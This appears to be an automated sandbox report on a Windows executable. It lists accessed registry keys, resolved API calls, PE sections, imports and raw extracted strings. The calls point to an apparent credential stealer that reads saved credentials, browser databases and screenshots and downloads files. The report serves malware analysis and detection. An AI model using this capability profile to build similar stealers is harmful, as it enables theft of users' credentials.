HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\1E4\52C64B7E\LanguageList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadNetworkName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5E5E0B13-621E-47B5-AA41-63B84D6692D2}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.VirtualProtect
kernel32.dll.GlobalAlloc
kernel32.dll.GetLastError
kernel32.dll.Sleep
kernel32.dll.VirtualAlloc
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Module32First
kernel32.dll.CloseHandle
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
kernel32.dll.WaitForSingleObject
kernel32.dll.GetModuleHandleA
kernel32.dll.GetLocaleInfoA
kernel32.dll.RemoveDirectoryTransactedA
kernel32.dll.GetUserDefaultLCID
kernel32.dll.DeleteFileA
kernel32.dll.CreateThread
kernel32.dll.lstrlenA
kernel32.dll.HeapAlloc
kernel32.dll.lstrcpynA
kernel32.dll.lstrcmpiW
kernel32.dll.GetModuleFileNameA
kernel32.dll.GetCurrentProcess
kernel32.dll.GetSystemPowerStatus
kernel32.dll.CreateMutexA
kernel32.dll.OpenProcess
kernel32.dll.MultiByteToWideChar
kernel32.dll.GetSystemWow64DirectoryW
kernel32.dll.GetTimeZoneInformation
kernel32.dll.OpenMutexA
kernel32.dll.Process32NextW
kernel32.dll.GetEnvironmentVariableA
kernel32.dll.lstrcpyA
kernel32.dll.Process32FirstW
kernel32.dll.GlobalFree
kernel32.dll.GetSystemInfo
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.WideCharToMultiByte
kernel32.dll.CreateProcessA
kernel32.dll.GetComputerNameA
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateFileA
kernel32.dll.FileTimeToSystemTime
kernel32.dll.GetLocalTime
kernel32.dll.GetTickCount
kernel32.dll.SetStdHandle
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.GetOEMCP
kernel32.dll.GetACP
kernel32.dll.IsValidCodePage
kernel32.dll.HeapReAlloc
kernel32.dll.OutputDebugStringW
kernel32.dll.GetFileSize
kernel32.dll.lstrcpyW
kernel32.dll.LoadLibraryW
kernel32.dll.GetVersionExW
kernel32.dll.lstrlenW
kernel32.dll.CreateDirectoryA
kernel32.dll.SystemTimeToFileTime
kernel32.dll.GetFileAttributesA
kernel32.dll.LocalFileTimeToFileTime
kernel32.dll.SetCurrentDirectoryA
kernel32.dll.GetCurrentDirectoryA
kernel32.dll.SetFilePointer
kernel32.dll.SetFileTime
kernel32.dll.WriteFile
kernel32.dll.ReadFile
kernel32.dll.FindClose
kernel32.dll.GetDriveTypeA
kernel32.dll.CopyFileTransactedA
kernel32.dll.CreateDirectoryTransactedA
kernel32.dll.FreeLibrary
kernel32.dll.GetProcessHeap
kernel32.dll.LocalFree
kernel32.dll.GetProcAddress
kernel32.dll.lstrcatW
kernel32.dll.LocalAlloc
kernel32.dll.SetEnvironmentVariableW
kernel32.dll.ReadConsoleW
kernel32.dll.EnumSystemLocalesW
kernel32.dll.IsValidLocale
kernel32.dll.GetTimeFormatW
kernel32.dll.GetDateFormatW
kernel32.dll.GetConsoleMode
kernel32.dll.GetConsoleCP
kernel32.dll.FlushFileBuffers
kernel32.dll.GetFileSizeEx
kernel32.dll.HeapSize
kernel32.dll.GetCommandLineW
kernel32.dll.GetCommandLineA
kernel32.dll.WriteConsoleW
kernel32.dll.GetModuleHandleExW
kernel32.dll.GetModuleFileNameW
kernel32.dll.GetFileType
kernel32.dll.GetStdHandle
kernel32.dll.LoadLibraryExW
kernel32.dll.DeleteFileTransactedA
kernel32.dll.GetFileInformationByHandle
kernel32.dll.HeapFree
kernel32.dll.RaiseException
kernel32.dll.RtlUnwind
kernel32.dll.InitializeSListHead
kernel32.dll.GetCurrentThreadId
kernel32.dll.GetCurrentProcessId
kernel32.dll.QueryPerformanceCounter
kernel32.dll.GetStartupInfoW
kernel32.dll.SetUnhandledExceptionFilter
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.IsDebuggerPresent
kernel32.dll.GetCPInfo
kernel32.dll.GetStringTypeW
kernel32.dll.GetLocaleInfoW
kernel32.dll.LCMapStringW
kernel32.dll.CompareStringW
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.TlsFree
kernel32.dll.TlsSetValue
kernel32.dll.TlsGetValue
kernel32.dll.TlsAlloc
kernel32.dll.SetCurrentDirectoryW
kernel32.dll.CreateDirectoryW
kernel32.dll.CreateFileW
kernel32.dll.DeleteFileW
kernel32.dll.FindFirstFileExW
kernel32.dll.FindNextFileW
kernel32.dll.GetFileAttributesExW
kernel32.dll.RemoveDirectoryW
kernel32.dll.SetEndOfFile
kernel32.dll.SetFilePointerEx
kernel32.dll.AreFileApisANSI
kernel32.dll.SetLastError
kernel32.dll.GetModuleHandleW
kernel32.dll.CopyFileW
kernel32.dll.FormatMessageW
kernel32.dll.EnterCriticalSection
kernel32.dll.LeaveCriticalSection
kernel32.dll.DeleteCriticalSection
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.SwitchToThread
user32.dll.GetDesktopWindow
user32.dll.wsprintfW
user32.dll.wsprintfA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayDevicesA
user32.dll.GetWindowDC
user32.dll.GetWindowRect
gdi32.dll.BitBlt
gdi32.dll.SaveDC
gdi32.dll.SelectObject
gdi32.dll.CreateDIBSection
gdi32.dll.CreateCompatibleDC
gdi32.dll.GetDeviceCaps
gdi32.dll.DeleteDC
gdi32.dll.RestoreDC
gdi32.dll.DeleteObject
advapi32.dll.GetTokenInformation
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptDestroyHash
advapi32.dll.RegQueryValueExA
advapi32.dll.GetUserNameA
advapi32.dll.CreateProcessWithTokenW
advapi32.dll.OpenProcessToken
advapi32.dll.RegOpenKeyExA
advapi32.dll.ConvertSidToStringSidW
advapi32.dll.DuplicateTokenEx
advapi32.dll.RegQueryValueExW
advapi32.dll.CryptReleaseContext
advapi32.dll.RegCloseKey
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegOpenKeyExW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CredEnumerateW
advapi32.dll.CredFree
advapi32.dll.CryptCreateHash
advapi32.dll.CryptHashData
shell32.dll.SHGetFolderPathA
shell32.dll.ShellExecuteA
shell32.dll.SHGetSpecialFolderPathW
ole32.dll.CoInitialize
ole32.dll.CoUninitialize
ole32.dll.CoTaskMemFree
ole32.dll.CoCreateInstance
userenv.dll.GetUserProfileDirectoryA
ktmw32.dll.RollbackTransaction
ktmw32.dll.CreateTransaction
ktmw32.dll.CommitTransaction
bcrypt.dll.BCryptDecrypt
bcrypt.dll.BCryptDestroyKey
bcrypt.dll.BCryptGenerateSymmetricKey
bcrypt.dll.BCryptOpenAlgorithmProvider
bcrypt.dll.BCryptSetProperty
bcrypt.dll.BCryptCloseAlgorithmProvider
crypt32.dll.CryptStringToBinaryA
crypt32.dll.CryptUnprotectData
shlwapi.dll.StrCmpNW
shlwapi.dll.StrStrIW
winhttp.dll.WinHttpCloseHandle
winhttp.dll.WinHttpSendRequest
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpQueryDataAvailable
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpReceiveResponse
winhttp.dll.WinHttpReadData
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipFree
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipCreateBitmapFromHBITMAP
gdiplus.dll.GdipAlloc
gdiplus.dll.GdipCloneImage
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdiplusShutdown
gdiplus.dll.GdipSaveImageToFile
msvcr100.dll.atexit
kernel32.dll.LCMapStringEx
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.InitOnceExecuteOnce
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.GetTickCount64
kernel32.dll.GetFileInformationByHandleEx
kernel32.dll.SetFileInformationByHandle
kernel32.dll.InitializeConditionVariable
kernel32.dll.WakeConditionVariable
kernel32.dll.WakeAllConditionVariable
kernel32.dll.SleepConditionVariableCS
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.TryAcquireSRWLockExclusive
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.SleepConditionVariableSRW
kernel32.dll.CreateThreadpoolWork
kernel32.dll.SubmitThreadpoolWork
kernel32.dll.CloseThreadpoolWork
kernel32.dll.CompareStringEx
kernel32.dll.GetLocaleInfoEx
cryptbase.dll.SystemFunction036
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.WSAIoctl
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
schannel.dll.SpUserModeInitialize
advapi32.dll.RegCreateKeyExW
ws2_32.dll.WSASend
ws2_32.dll.WSARecv
secur32.dll.FreeContextBuffer
ncrypt.dll.SslOpenProvider
ncrypt.dll.GetSChannelInterface
bcryptprimitives.dll.GetHashInterface
ncrypt.dll.SslIncrementProviderReferenceCount
ncrypt.dll.SslImportKey
bcryptprimitives.dll.GetCipherInterface
ncrypt.dll.SslLookupCipherSuiteInfo
user32.dll.LoadStringW
ncrypt.dll.BCryptOpenAlgorithmProvider
ncrypt.dll.BCryptGetProperty
ncrypt.dll.BCryptCreateHash
ncrypt.dll.BCryptHashData
ncrypt.dll.BCryptFinishHash
ncrypt.dll.BCryptDestroyHash
crypt32.dll.CertGetCertificateChain
userenv.dll.GetUserProfileDirectoryW
sechost.dll.ConvertSidToStringSidW
sechost.dll.ConvertStringSidToSidW
userenv.dll.RegisterGPNotification
gpapi.dll.RegisterGPNotificationInternal
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.CloseServiceHandle
sechost.dll.QueryServiceConfigW
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptGetKeyParam
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptVerifySignatureA
cryptsp.dll.CryptDestroyHash
bcryptprimitives.dll.GetAsymmetricEncryptionInterface
ncrypt.dll.BCryptImportKeyPair
ncrypt.dll.BCryptVerifySignature
ncrypt.dll.BCryptDestroyKey
crypt32.dll.CertVerifyCertificateChainPolicy
crypt32.dll.CertFreeCertificateChain
crypt32.dll.CertDuplicateCertificateContext
ncrypt.dll.SslEncryptPacket
ncrypt.dll.SslDecryptPacket
crypt32.dll.CertFreeCertificateContext
rpcrt4.dll.RpcBindingFree
urlmon.dll.URLDownloadToFileA
ws2_32.dll.#23
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
urlmon.dll.CoInternetCreateSecurityManager
urlmon.dll.CoInternetCreateZoneManager
ws2_32.dll.GetAddrInfoExW
ws2_32.dll.FreeAddrInfoExW
kernel32.dll.QueryActCtxW
kernel32.dll.CreateActCtxW
oleaut32.dll.#8
oleaut32.dll.#9
kernel32.dll.ActivateActCtx
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.DeactivateActCtx
oleaut32.dll.DllGetClassObject
ws2_32.dll.getaddrinfo
ws2_32.dll.getnameinfo
ws2_32.dll.freeaddrinfo
oleaut32.dll.DllCanUnloadNow
ws2_32.dll.#112
ws2_32.dll.#15
ws2_32.dll.WSASocketA
ws2_32.dll.#7
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
oleaut32.dll.#500
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
oleaut32.dll.#6
sqlite3.dll.sqlite3_open_v2
sqlite3.dll.sqlite3_prepare_v2
sqlite3.dll.sqlite3_step
sqlite3.dll.sqlite3_column_bytes
sqlite3.dll.sqlite3_column_blob
sqlite3.dll.sqlite3_column_text
sqlite3.dll.sqlite3_finalize
sqlite3.dll.sqlite3_close
kernelbase.dll.CompareStringEx
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCIDToLocaleName
kernel32.dll.LocaleNameToLCID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemAlloc
wininet.dll.FindFirstUrlCacheEntryA
api-ms-win-downlevel-ole32-l1-1-0.dll.CoTaskMemFree
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultFree
ncrypt.dll.SslDecrementProviderReferenceCount
ncrypt.dll.SslFreeObject
pstorec.dll.PStoreCreateInstance
ws2_32.dll.#22
C:\Windows\system32\lsass.exe
btirweunhdtr-Louise
VaultSvc

BinGraph Download graph

PE Information

Image Base Entry Point Reported Checksum Actual Checksum Minimum OS Version Compile Time Import Hash Icon Icon Exact Hash Icon Similarity Hash
0x00400000 0x00402a8d 0x0007d6c6 0x0007d6c6 5.0 2020-01-02 11:13:07 f5d5443ed108c778ddd43c210205d9bd ff8c971482ba8b3be4635d948ee9ff4d ef457a4f4ee325a03eeef62402df07b9

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00000400 0x00001000 0x00063685 0x00063800 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 7.91
.rdata 0x00063c00 0x00065000 0x00003592 0x00003600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.33
.data 0x00067200 0x00069000 0x03c8e114 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 2.89
.rsrc 0x00069200 0x03cf8000 0x0000bec0 0x0000c000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.20

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_ICON 0x03d03808 0x00000468 LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 6.29 None
RT_DIALOG 0x03d03cd0 0x0000008c LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 3.01 None
RT_GROUP_ICON 0x03d03c70 0x0000005a LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 2.77 None
RT_GROUP_ICON 0x03d03c70 0x0000005a LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 2.77 None
RT_VERSION 0x03d03d60 0x0000015c LANG_SERBIAN SUBLANG_ARABIC_TUNISIA 3.38 None

Imports

0x46500c FormatMessageA
0x465014 GetCurrencyFormatW
0x465018 LoadLibraryW
0x46501c ReplaceFileW
0x465020 ReadFile
0x465024 IsBadStringPtrA
0x465028 SetConsoleTitleA
0x465030 GetLastError
0x465034 GetProcAddress
0x46503c OpenWaitableTimerW
0x465040 LocalAlloc
0x465044 CreateHardLinkW
0x465048 DebugBreakProcess
0x46504c GlobalAddAtomW
0x465050 GetTempPathA
0x465054 OpenFileMappingA
0x465058 LocalFree
0x46505c LCMapStringW
0x465060 SetComputerNameW
0x465064 GetUserDefaultLCID
0x465068 GetCurrentProcess
0x46506c lstrlenA
0x465074 GetTapeStatus
0x465078 GetCommandLineW
0x465084 Sleep
0x465098 GetCommandLineA
0x46509c GetStartupInfoA
0x4650a0 RaiseException
0x4650a4 RtlUnwind
0x4650b0 HeapFree
0x4650b4 TerminateProcess
0x4650b8 IsDebuggerPresent
0x4650bc HeapAlloc
0x4650c0 GetModuleHandleW
0x4650c4 ExitProcess
0x4650c8 WriteFile
0x4650cc GetStdHandle
0x4650d0 GetModuleFileNameA
0x4650e0 WideCharToMultiByte
0x4650e8 SetHandleCount
0x4650ec GetFileType
0x4650f0 TlsGetValue
0x4650f4 TlsAlloc
0x4650f8 TlsSetValue
0x4650fc TlsFree
0x465100 SetLastError
0x465104 GetCurrentThreadId
0x465108 HeapCreate
0x46510c VirtualFree
0x465114 GetTickCount
0x465118 GetCurrentProcessId
0x465120 HeapSize
0x465124 VirtualAlloc
0x465128 HeapReAlloc
0x46512c GetCPInfo
0x465130 GetACP
0x465134 GetOEMCP
0x465138 IsValidCodePage
0x46513c GetLocaleInfoA
0x465140 GetStringTypeA
0x465144 MultiByteToWideChar
0x465148 GetStringTypeW
0x46514c GetModuleHandleA
0x465150 LoadLibraryA
0x465158 LCMapStringA
0x46515c GetConsoleCP
0x465160 GetConsoleMode
0x465164 FlushFileBuffers
0x465168 SetFilePointer
0x46516c CloseHandle
0x465170 WriteConsoleA
0x465174 GetConsoleOutputCP
0x465178 WriteConsoleW
0x46517c SetStdHandle
0x465180 CreateFileA

!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.rsrc
0WWWWW
VVVVV
0WWWWW
HYYtJHt9H
VVVVV
YQPVh
QQSVWd
Y__^[
Y_^[]
0SSSSS
tqJtE
tNIt?It0It
PPPPP
, <Xw
t%HHt
HHtXHHt
HHty+
>If90t
Y__^[
t hh\F
X 9}
VVVVV
j-Xf;
j+Xf;
jeXf;
jEXf;
j+Xf;
VVVVV
Gj^GXf;
j]Xf;
Gj-YGf;
j]Zf;
j]Yf;
j+Xf;
j0Xf;
t\jXXf;
YYj0[
PPPPP
j-Xf;
j+Xf;
ou'j8Xf;
j8Xf;
VVVVV
u&hP[F
PPPPP
VVVVV
VVVVV
VVVVV
t$<"u
>=Yt1j
tNVSP
PPPPP
< tK<
@PWSS
WWWWW
s[S;7|G;w
YYhx\F
tR99u2
@_^[]
PPPPP
v$;5<
0SSSSS
PPPPPPPP
0SSSSS
9] SS
PPPPPPPP
tRHtCHt4Ht%HtFHHt
~,WPV
VVVVV
VVVVV
^SSSSS
j"^SSSSS
QSWVj
URPQQh
_VVVVV
SSSSS
SSSSS
^WWWWW
PPPPP
SSSSS
SSSSS
VVVVV
SSSSS
QSSSj
^SSSSS
VVVVV
WWWWW
uL9=P
wIVSP
SSSSS
SVWUj
;t$,v-
UQPXY]Y[
u8SS3
9]$SS
t"SS9]
WWWWV
t+WWVPV
WWWWW
WWWWW
VVVVV
VVVVV
WWWWW
SSSSS
WWWWW
WWWWW
WWWWW
SSSSW
SSSSW
0SSSSS
PPPPP
_VVVVV
WWWWW
@WuyV
WWWWW
VVVVV
WWWWW
WWWWW
VW|[;
VVVVV
SSSSS
<+t(<-t$:
+t HHt
u;h0nF
u,h(nF
VVVVV
*h nF
VVVVV
SSSSS
SSSSS
VVVVV
3b)e{
?Z6"I
PzM &
|z1[_
;l;`~V
?_181
!CMY~g
iZSxq
"i[}d
p)"6o
H|(w0
3*lQ]
vezUY;
Rwxo{
Fp3Dz
FRLVL{m&}e
sd#8x
HA/Iw
MCZWot
D!]Zt'
g~4Ux
TQASl
!Sd9M
Sgi\3
g|'Di
Gq:X(
$zF#9
H%AuaH:
W^;A&7d
tAe3b8
t!cIKJF/
!MU^WT5I
!<MM+\
Ho&dXx
Z&B.l
Rl50b
-H}rcV
!D/p
D(;!%p
;oon!
*zx?K
Vb8YyUw
P.bi}+
GB]>"Q
T$CF~
W^iNk
x4:rW7
miB>S
x7|&68)
,0b^e
{5QW(
aDo5]
^7LX
T(qb'
@mmc[
]bVx9F
ec&5Iif;
HSRi%
@\*#u
zn^2x
+D+`tw4:R
LYB[W+
G>ld&
##F)r
dWh*d:34
/I6Lf
>FC{R
P[wN>
KIYwI
Uy:q4
$MU#.iqqbR
tK>o4
!MM<l
GS^ri
-d;PR
<:6#EY
j]{>Vm
GJSwu$
-IH~d+h
O0Ax(F
}ieFG
Id}r&
eXk?W
q~(i52
.]aws=
[DT ?[y
1x{i_
s0;2-
(}e9y
-dbpW]3
8+18;7"
xg,,J
6#~;>\
